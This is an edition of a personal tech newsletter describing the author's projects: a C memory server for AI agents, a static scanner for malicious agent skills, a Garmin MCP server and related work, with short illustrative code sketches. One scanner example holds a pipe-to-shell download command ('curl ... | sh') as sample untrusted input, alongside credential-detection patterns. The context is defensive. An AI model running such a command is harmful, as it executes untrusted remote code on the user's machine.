Est. June 2025 · Dispatches from the Frontier of Code & Security · Price: One Good Commit

Rögnvaldr Chronicle

“Pushing the boundaries of what’s possible in technology while frustrating adversaries”
Vol. II · No. 4 · Saturday, April 25, 2026 · Ron Dilley · Correspondent

MnemonAI: 12,500 Lines of C Give AI Agents a Permanent Memory

A bi-temporal knowledge graph with hybrid search ships as a full MCP server—local embeddings, ACID guarantees, and sub-25ms queries at one million memories

AI Infrastructure

MnemonAI: A Memory MCP Server Written in Pure C

12,500 lines of C, 343 tests, bi-temporal knowledge graph, and hybrid search—because AI agents deserve memories that outlast a session.

The problem with most AI agent architectures is amnesia. Every session starts from zero. Every context window is a blank slate. MnemonAI, which landed in April across 16 commits from initial concept to production-ready MCP server, addresses this directly: a local-only memory system that gives LLM agents persistent, searchable, temporally-aware memory through the Model Context Protocol.

At its core sits a bi-temporal knowledge graph—tracking both domain time (when something happened) and transaction time (when it was recorded)—combined with three search backends operating in concert: LMDB for primary key-value storage with ACID guarantees, SQLite FTS5 for BM25 keyword search, and usearch for HNSW vector similarity. Queries fuse results through Reciprocal Rank Fusion, and the system serves it all through 35 MCP tools covering memory CRUD, search, temporal queries, bulk import, and maintenance operations.
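For readers who want to see the two time axes in miniature, here is a small sketch of a bi-temporal "as of" lookup. It is not MnemonAI's schema: the Fact record, its field names, and the as_of helper are all hypothetical, chosen only to show how domain time and transaction time are filtered independently.

```python
from dataclasses import dataclass
from datetime import datetime
from typing import Optional


@dataclass(frozen=True)
class Fact:
    """One version of a fact. All field names are hypothetical."""
    key: str
    value: str
    valid_from: datetime                      # domain time: when it became true
    valid_to: Optional[datetime]              # domain time: when it stopped being true
    recorded_at: datetime                     # transaction time: when it was stored
    superseded_at: Optional[datetime] = None  # transaction time: when it was replaced


def as_of(facts, key, valid_at, known_at):
    """Value of `key` that held at `valid_at`, as the store believed at `known_at`."""
    for f in facts:
        if f.key != key:
            continue
        in_domain = f.valid_from <= valid_at and (
            f.valid_to is None or valid_at < f.valid_to)
        in_txn = f.recorded_at <= known_at and (
            f.superseded_at is None or known_at < f.superseded_at)
        if in_domain and in_txn:
            return f.value
    return None


def day(month, d):
    return datetime(2026, month, d)


# Made-up history: on Mar 1 the store learns the user switched editors on Feb 1.
facts = [
    Fact("editor", "vim", day(1, 1), None, day(1, 5), superseded_at=day(3, 1)),
    Fact("editor", "vim", day(1, 1), day(2, 1), day(3, 1)),
    Fact("editor", "emacs", day(2, 1), None, day(3, 1)),
]

before_correction = as_of(facts, "editor", day(2, 15), known_at=day(2, 20))  # "vim"
after_correction = as_of(facts, "editor", day(2, 15), known_at=day(3, 2))    # "emacs"
```

The same question about February 15 gets two different answers depending on when it is asked. That is the property a single timestamp cannot provide.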

The engineering is uncompromising. Embeddings are generated locally via llama.cpp with nomic-embed-text-v1.5—no external API calls, no data leaving the machine. Hardware detection auto-selects AMD ROCm, NVIDIA CUDA, Intel GPU, AMD XDNA NPU, or SIMD paths depending on what the host offers. The result is hybrid search at one million memories with p50 latency of 18ms and p95 of 22ms on a single client, scaling to p99 of 104ms under ten concurrent clients.

Security features include secret detection, prompt injection scanning, rate limiting, and full audit logging. Crash safety comes from LMDB’s memory-mapped I/O with ACID transactions and rebuildable indexes. The server supports both local stdio transport and network HTTP with TLS and Bearer auth, installs to ~/.local/ with no root required, and ships with a systemd user service for auto-start.

“AI agents without memory are just expensive autocomplete. MnemonAI fixes that at the protocol layer.”

— Project README

Architecture

Inside the Hybrid Search Engine

Three search backends, one fusion algorithm, and a storage budget of ~7.5KB per memory

The choice of LMDB as the primary store is deliberate. Memory-mapped I/O means reads never copy data: the operating system’s page cache is the read cache. Writes are transactional with copy-on-write semantics, so a crash mid-write leaves the database intact. This is the same engine that powers OpenLDAP and Lightning Network nodes, chosen here for the same reason: its copy-on-write design is built so that a crash cannot corrupt committed data.

SQLite FTS5 handles keyword search with BM25 scoring, supporting prefix queries, phrase matching, and boolean operators. The vector index uses usearch’s HNSW algorithm for approximate nearest-neighbor search over locally-generated embeddings. At query time, all three backends run in parallel, and Reciprocal Rank Fusion merges their results into a unified relevance ranking.
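Reciprocal Rank Fusion is simple enough to sketch in a few lines. The version below is an illustration, not MnemonAI's code: the function name rrf_fuse is hypothetical, the constant k=60 is the value commonly used in the literature rather than anything the project documents, and the memory IDs are made up. Each ranked list contributes 1/(k + rank) to every item it contains, and the summed scores decide the final order.

```python
from collections import defaultdict


def rrf_fuse(rankings, k=60):
    """Merge several ranked lists of IDs with Reciprocal Rank Fusion.

    rankings: iterable of lists, each ordered best-first.
    k: smoothing constant (60 is a conventional default, assumed here).
    """
    scores = defaultdict(float)
    for ranking in rankings:
        for rank, item_id in enumerate(ranking, start=1):
            scores[item_id] += 1.0 / (k + rank)
    # Highest fused score first; ties broken by ID for a stable order.
    return sorted(scores, key=lambda item_id: (-scores[item_id], item_id))


# Hypothetical result lists from a keyword backend and a vector backend.
keyword_hits = ["m3", "m1", "m7"]
vector_hits = ["m1", "m9", "m3"]

fused = rrf_fuse([keyword_hits, vector_hits])
# fused == ["m1", "m3", "m9", "m7"]
```

Because only ranks are used, BM25 scores and vector distances never have to be put on a common scale, which is the usual reason for reaching for RRF in a hybrid setup.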

The memory footprint is predictable: approximately 7.5KB per memory in RAM, so one million memories require roughly 7.5GB. The architecture is designed for machines that are already running LLM inference: if you have enough RAM for a 7B model, you have enough for a substantial memory store alongside it.
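As a quick check on that estimate, the per-memory figure can be turned into a capacity calculation. The 7.5KB figure is the article's; the helper names and the use of decimal units (1KB = 1,000 bytes) are assumptions made for this sketch.

```python
BYTES_PER_MEMORY = 7.5 * 1000  # ~7.5KB per memory (article's figure, decimal KB assumed)


def ram_needed_gb(n_memories, bytes_per_memory=BYTES_PER_MEMORY):
    """Approximate resident memory, in decimal GB, for n_memories entries."""
    return n_memories * bytes_per_memory / 1e9


def memories_that_fit(ram_gb, bytes_per_memory=BYTES_PER_MEMORY):
    """How many memories fit in a RAM budget of ram_gb decimal GB."""
    return int(ram_gb * 1e9 // bytes_per_memory)


one_million = ram_needed_gb(1_000_000)  # 7.5
in_four_gb = memories_that_fit(4)       # 533333
```

The budget scales linearly, so a 4GB allowance holds a little over half a million memories under the same assumption.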


Benchmarks

LongMemEval and Performance Testing

Formal benchmark suite validates retrieval quality alongside raw throughput

April saw the addition of LongMemEval benchmarking to the test suite, providing a standardized measure of long-term memory retrieval quality across various query patterns. The existing 196 C unit tests and 105 MCP integration tests account for 301 of the project’s 343 tests, which together cover everything from LMDB transaction safety to end-to-end MCP compliance.

Performance benchmarks tell the throughput story: at 100K memories, hybrid search completes in under 10ms p50. At one million, the p50 climbs to 18ms—still well within the latency budget of any conversational agent. Write throughput sustains thousands of memories per second, bounded primarily by embedding generation speed.
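For anyone reproducing latency figures like these, the percentile arithmetic is worth pinning down, since different tools define it differently. The sketch below uses the nearest-rank definition. Both the definition and the sample values are assumptions for illustration: the article does not say how MnemonAI's benchmark computes its percentiles, and the numbers here are not measurements.

```python
import math


def percentile(samples, p):
    """Nearest-rank percentile: smallest sample with at least p% of samples at or below it."""
    if not samples:
        raise ValueError("no samples")
    ordered = sorted(samples)
    rank = max(1, math.ceil(p * len(ordered) / 100))
    return ordered[rank - 1]


# Made-up query latencies in milliseconds, including one slow outlier.
latencies_ms = [12, 15, 17, 18, 18, 19, 20, 21, 22, 104]

p50 = percentile(latencies_ms, 50)  # 18
p90 = percentile(latencies_ms, 90)  # 22
p95 = percentile(latencies_ms, 95)  # 104
```

With only ten samples the outlier dominates p95, which is why tail percentiles are usually reported over thousands of queries.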

Development

From Initial Commit to Production in Two Weeks

16 commits trace the arc from empty repo to documented, benchmarked, vulnerability-patched MCP server

The commit history tells a story of focused intensity. April 4th saw the initial commit followed immediately by a complete initial implementation with all features written and tested—the kind of opening salvo that suggests extensive design work happened before fingers hit the keyboard.

April 5th brought a flurry of seven commits: fleshing out functionality, implementing features that had been stubbed, adding local user installation instructions, fixing vulnerabilities, addressing a ROCm bug, fixing a default config location issue, and adding the MCP integration reference documentation. This was the hardening phase—taking a working prototype and making it production-worthy.

April 6th through 8th focused on documentation, how-to guides, and the addition of formal LongMemEval benchmarking. The final commits on April 16th and 18th addressed memory performance and updated documentation—the quiet refinements that distinguish a shipped project from a prototype.


Ecosystem

Building the Local AI Stack

MnemonAI joins ProfessorAI and Podcastorum in a growing suite of local-first AI infrastructure

With MnemonAI providing persistent memory and ProfessorAI (shipped in March) serving local LLM inference via an OpenAI-compatible API, a pattern emerges: Ron is assembling a complete local AI stack where no data leaves the machine. ProfessorAI handles inference on AMD ROCm hardware, MnemonAI handles persistent memory through MCP, and Podcastorum demonstrates the kind of application these building blocks enable: local transcription and multi-model analysis of podcast audio without ever phoning home.

The common thread is C11 for the infrastructure layer (ProfessorAI, MnemonAI) and Python for the application layer (Podcastorum, llm_compare). Each piece wraps complex dependencies—llama.cpp, Whisper, LMDB—behind clean Unix interfaces: daemons, configuration files, systemd services, and standardized APIs. It’s the kind of stack that a privacy-conscious developer builds when they want the capabilities of cloud AI without the cloud.


AI Security

ToxicSkillHunter: Scanning the AI Supply Chain

Two generations of a static scanner for AI agent skills, MCP packages, and tool manifests—440 tests and zero executed artifacts

If MnemonAI asks what AI agents should remember, ToxicSkillHunter asks what AI agents should never be allowed to do. Shipped across two iterations in April (v1 on Apr 18–19, v2 rewrite on Apr 21–25), the scanner performs static analysis on AI agent skills, MCP packages, tool manifests, IDE rules files, and agent memory files, finding dangerous behaviors, hidden privileges, exfiltration paths, and trust-boundary violations without executing a single line of harvested code.

The first generation established the architecture: adapter-based harvesting from LocalPath, Git, GitHub, npm, and PyPI sources; a typed intermediate representation with Tainted<T> phantom types; per-parser sub-process isolation with OS-level resource caps; eight deterministic detectors plus TruffleHog integration; taint-aware cross-artifact attack graphs; and cryptographically signed SARIF 2.1.0 output. The containment axiom: “context must never become control.”
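The Tainted<T> idea can be approximated in a few lines. The sketch below is an illustration only, not ToxicSkillHunter's type: the method names map and inspect are hypothetical, and because Python has no compile-time phantom types, this is a runtime wrapper that mimics the discipline rather than enforcing it through the type checker alone.

```python
from typing import Callable, Generic, TypeVar

T = TypeVar("T")
U = TypeVar("U")


class Tainted(Generic[T]):
    """Wraps untrusted data so it cannot be used as a plain value by accident."""

    def __init__(self, value: T) -> None:
        self._value = value

    def map(self, fn: Callable[[T], U]) -> "Tainted[U]":
        """Transform the payload; the result stays tainted."""
        return Tainted(fn(self._value))

    def inspect(self, fn: Callable[[T], U]) -> U:
        """Explicit, greppable exit point for read-only analysis (hypothetical name)."""
        return fn(self._value)

    def __repr__(self) -> str:
        # Never echo untrusted content into logs or reports.
        return "Tainted(<redacted>)"


# Harvested text is wrapped at the boundary and only read through inspect().
harvested = Tainted("curl http://example.invalid/install.sh | sh")
pipes_to_shell = harvested.inspect(lambda s: "| sh" in s)
still_tainted = harvested.map(str.upper)
```

The point of the wrapper is that every place untrusted content is actually read becomes a named call, which makes "context must never become control" something a reviewer can search for.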

The second generation rebuilt around a single-copy artifact store backed by SQLite, added local ML model auto-provisioning for semantic confirmation of findings, and integrated ClamAV and Microsoft Defender for third-party A/V validation. The normal analysis path collapsed to two commands—harvest then scan—with ML, semantic confirmation, and A/V running as default pipeline stages that can be individually disabled.

··· “Frustrating adversaries since the dial-up era” · GitHub: rondilley · 43 Repositories and Counting ···

Around the Workshop

Published in 2600: “Prairie Dogs and Packet Dreams”

A personal timeline of hacker ethics, ethos, learning, and the long argument about what it all is—Spring 2026, pages 56–57

The Spring 2026 edition of 2600: The Hacker Quarterly carries “Prairie Dogs and Packet Dreams — A Personal Timeline of Hacker Ethics, Ethos, Learning, and the Long Argument About What It All Is” on pages 56–57. The article grew out of the hacker_rag project—a retrieval-augmented generation system built to explore the history and philosophy of hacking culture—and distills decades of firsthand experience into a meditation on what the hacker ethos actually means when the people arguing about it have been living it since the dial-up era. Getting ink in 2600 remains one of those milestones that matters to the people who understand why it matters.

• • •

The Rögnvaldr Chronicle Gets a Proper Home

April also saw the launch of www.rognvaldr.me—a proper website for the Chronicle, replacing the collection of standalone HTML files with a newspaper-style site featuring edition navigation, a podcast editorial analysis section, and links to the broader constellation of projects. The site displays the current edition on the main page with one-click access to all past issues and the growing library of podcast analyses.

• • •

Podcast Editorial Analyses Expanding

The Podcastorum pipeline continued to produce editorial analyses throughout April, with the collection growing to cover multiple Darknet Diaries episodes alongside broader philosophical and historical topics. Each analysis goes through a multi-model synthesis pipeline—not summaries but genuine critical examinations of the arguments, blind spots, and practical takeaways from each episode. The analyses are now published on the Rögnvaldr website alongside the monthly chronicles.

• • •

MyHealth MCP: Garmin Data Meets the Protocol Layer

Shipped April 24th, MyHealth_MCP is a local, single-user MCP server that exposes Garmin Connect data to LLM clients over stdio. Four read-only tools—get_status, garmin_list_activities, garmin_get_activity, and garmin_get_sleep—let an AI agent query fitness and sleep data without credentials ever reaching the model. Session tokens are provisioned once via a separate command; the MCP itself never prompts for passwords. Strava integration is planned for a future iteration.
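On the wire, a client invoking one of these tools sends a JSON-RPC 2.0 request with the method tools/call, framed as a single line over stdio. The sketch below builds such a message. The tool name comes from the article, but the "limit" argument is a guess, since the tool's actual input schema is not described here, and the helper names are hypothetical.

```python
import json


def tools_call_request(request_id, tool_name, arguments):
    """Build an MCP tools/call request as a JSON-RPC 2.0 message."""
    return {
        "jsonrpc": "2.0",
        "id": request_id,
        "method": "tools/call",
        "params": {"name": tool_name, "arguments": arguments},
    }


def frame_for_stdio(message):
    """Serialize as one newline-terminated line with no embedded newlines."""
    return json.dumps(message, separators=(",", ":")) + "\n"


# "limit" is a hypothetical argument; consult the tool's schema for real names.
request = tools_call_request(1, "garmin_list_activities", {"limit": 5})
wire_line = frame_for_stdio(request)
```

Nothing in the message carries a credential, which is consistent with the design described above: the session token is provisioned out of band and the model only ever sees tool names and arguments.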

• • •

Hacker RAG Refreshed for Current Models

The retrieval-augmented generation system behind the 2600 article received a mid-April refresh (Apr 17), updating its embeddings and retrieval pipeline to work with current-generation models. The project—which ingests foundational hacker culture texts and enables citation-backed exploration of decades of hacker thought—continues to serve as both a research tool and a demonstration of applied RAG architecture.

• • •

Deployment Patterns: The Unix Way

A recurring theme across MnemonAI, ProfessorAI, and the broader project suite is a commitment to Unix deployment conventions: INI configuration files with CLI overrides, systemd service files for process management, syslog for logging, ~/.local/ for user-space installation, and standard signal handling for graceful shutdown. In an era of Docker containers and Kubernetes manifests, there’s something refreshingly direct about a make install that puts a binary in your path and a config in your home directory.
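The "INI file with CLI overrides" convention boils down to a fixed precedence order: built-in defaults, then the config file, then the command line. The projects themselves are written in C; the Python sketch below only illustrates the precedence logic, and the section name, keys, and flags are all hypothetical.

```python
import argparse
import configparser

DEFAULTS = {"port": "8080", "log_level": "info"}  # hypothetical keys and values


def load_settings(ini_text, argv):
    """Merge defaults, then the [server] section of an INI file, then CLI flags."""
    settings = dict(DEFAULTS)

    parser = configparser.ConfigParser()
    parser.read_string(ini_text)
    if parser.has_section("server"):
        settings.update(parser["server"])

    cli = argparse.ArgumentParser()
    cli.add_argument("--port")
    cli.add_argument("--log-level", dest="log_level")
    args = cli.parse_args(argv)
    # Only flags the user actually passed override the file.
    settings.update({k: v for k, v in vars(args).items() if v is not None})
    return settings


example = load_settings("[server]\nport = 9000\n", ["--log-level", "debug"])
# example == {"port": "9000", "log_level": "debug"}
```

Here the port comes from the file and the log level from the command line, while anything unspecified falls back to the default.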

Technical Notes

MnemonAI: Deployment Modes

Two deployment configurations ship out of the box: local stdio mode where the MCP client launches mnemond as a child process on the same machine, and network HTTP mode where a central server accepts connections from multiple remote clients sharing a single knowledge base. TLS and Bearer auth secure the network path.
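For the network mode, the Bearer check itself is small but easy to get subtly wrong. The sketch below shows one reasonable way to validate an Authorization header with a constant-time comparison. It is an assumption about how such a check could look, not a description of what mnemond does, and the function name is hypothetical.

```python
import hmac


def bearer_token_ok(authorization_header, expected_token):
    """Return True only for 'Bearer <token>' where the token matches exactly."""
    scheme, _, presented = (authorization_header or "").partition(" ")
    if scheme.lower() != "bearer" or not presented:
        return False
    # compare_digest avoids leaking how many leading bytes matched.
    return hmac.compare_digest(presented.strip().encode(), expected_token.encode())


accepted = bearer_token_ok("Bearer s3cret", "s3cret")
rejected = bearer_token_ok("Bearer wrong", "s3cret")
```

A plain == comparison would give the same answers. The constant-time version simply removes timing as a side channel for guessing the token.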

Hardware-Aware Inference

Both MnemonAI and ProfessorAI auto-detect available hardware acceleration at startup—AMD ROCm GPUs, NVIDIA CUDA, Intel integrated graphics, AMD XDNA NPUs, and x86 SIMD instruction sets. The correct compute path is selected automatically, with fallback to CPU. No manual configuration required for the common case.

Security by Default

MnemonAI’s security posture goes beyond authentication: secret detection scans incoming memories for API keys and credentials before storage, prompt injection scanning guards against adversarial inputs designed to manipulate the retrieval pipeline, and rate limiting prevents resource exhaustion. Audit logging records every operation for forensic review.
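A pre-storage secret scan of the kind described can be sketched with a handful of regular expressions. The patterns below match well-known public token formats and are illustrative only. MnemonAI's actual rules are not documented here, and the function names and the reject-on-hit policy are assumptions.

```python
import re

# Illustrative patterns for widely documented credential formats.
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "github_token": re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
    "private_key_block": re.compile(
        r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
}


def find_secrets(text):
    """Return the sorted names of every pattern that matches the text."""
    return sorted(name for name, pat in SECRET_PATTERNS.items() if pat.search(text))


def store_memory(text, store):
    """Append text to store unless it looks like it contains a secret."""
    hits = find_secrets(text)
    if not hits:
        store.append(text)
    return hits


store = []
# AKIAIOSFODNN7EXAMPLE is the placeholder key used in AWS documentation.
blocked = store_memory("deploy key is AKIAIOSFODNN7EXAMPLE", store)
allowed = store_memory("user prefers dark mode", store)
```

Pattern matching like this catches known formats only. Generic high-entropy strings need a different kind of check, which is one reason a real scanner layers several detectors.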

ToxicSkillHunter: The Containment Axiom

The scanner’s core principle—“context must never become control”—means untrusted input is analyzed but never executed. Per-parser sub-process isolation enforces OS-level resource caps. API keys live in restricted memory regions the analysis plane cannot name. Output is cryptographically signed SARIF 2.1.0, decontaminated through a dedicated egress stage. The v2 rewrite added a single-copy SQLite artifact store, local ML auto-provisioning, and integrated ClamAV/Defender A/V validation.

The Stack
Primary Language: C11 (MnemonAI, ProfessorAI)
Application Layer: Python (ToxicSkillHunter, MyHealth, Podcastorum)
Storage: LMDB + SQLite FTS5 + usearch
Embeddings: llama.cpp (nomic-embed-text-v1.5)
Protocol: MCP (stdio + HTTP/TLS)
Hardware: AMD ROCm, NVIDIA, Intel, XDNA NPU
Tests: 343 (MnemonAI alone)
Achievements: Arctic Code Vault, Starstruck, 2600 Author